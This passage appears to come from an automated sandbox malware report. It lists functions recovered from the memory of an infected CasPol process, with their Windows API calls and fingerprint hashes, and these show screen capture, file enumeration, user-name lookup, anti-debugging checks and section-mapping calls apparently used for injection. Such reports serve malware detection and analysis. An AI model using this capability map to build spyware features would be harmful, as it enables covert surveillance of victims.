                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                              • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                                              • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                              • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                                              • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                              Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$FirstH_prologNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 301083792-0
                                                                                                              • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                                                                              • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                              • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                                                                              • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                              Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 2829624132-0
                                                                                                              • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                              • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                              • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                              • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                              Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 0043A75F
                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043A76C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                              • String ID:
                                                                                                              • API String ID: 3906539128-0
                                                                                                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                              • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                              • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                              Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 1815803762-0
                                                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                              Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .
                                                                                                              • API String ID: 0-248832578
                                                                                                              • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                              • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                              • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                              • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                              Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                              • String ID: <D
                                                                                                              • API String ID: 1084509184-3866323178
                                                                                                              • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                              • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                              • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                              • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                              Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                              • String ID: <D
                                                                                                              • API String ID: 1084509184-3866323178
                                                                                                              • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                              • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                              • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                              • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                              Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                              • Opcode ID: e6c87920e06762166a5833a65f3cc1d4ab5ad226655bcee6b6e0faca9150eed0
                                                                                                              • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                              • Opcode Fuzzy Hash: e6c87920e06762166a5833a65f3cc1d4ab5ad226655bcee6b6e0faca9150eed0
                                                                                                              • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                              Function 00450A7F Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1661935332-0
                                                                                                              • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                              • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                              • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                              • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                              Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 1663032902-0
                                                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                              • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                              • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                              Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2692324296-0
                                                                                                              • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                              • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                              • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                              • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                              Function 0041A7A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: NameUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2645101109-0
                                                                                                              • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                              • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                              Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                              • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1272433827-0
                                                                                                              • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                              • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                              • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                              • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                              Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1084509184-0
                                                                                                              • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                              • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                              • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                              • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                              Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                              • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                              Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: HeapProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 54951025-0
                                                                                                              • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                              • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                              • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                              • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                              Function 00417F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                              • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                              • GetIconInfo.USER32 ref: 004180CB
                                                                                                              • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                              • DeleteObject.GDI32(?), ref: 00418107
                                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                              • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                              • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                              • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                              • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                              • DeleteDC.GDI32(?), ref: 00418398
                                                                                                              • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                              • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                              • String ID: DISPLAY
                                                                                                              • API String ID: 1765752176-865373369
                                                                                                              • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                                                              • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                              • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                                                              • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                              Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
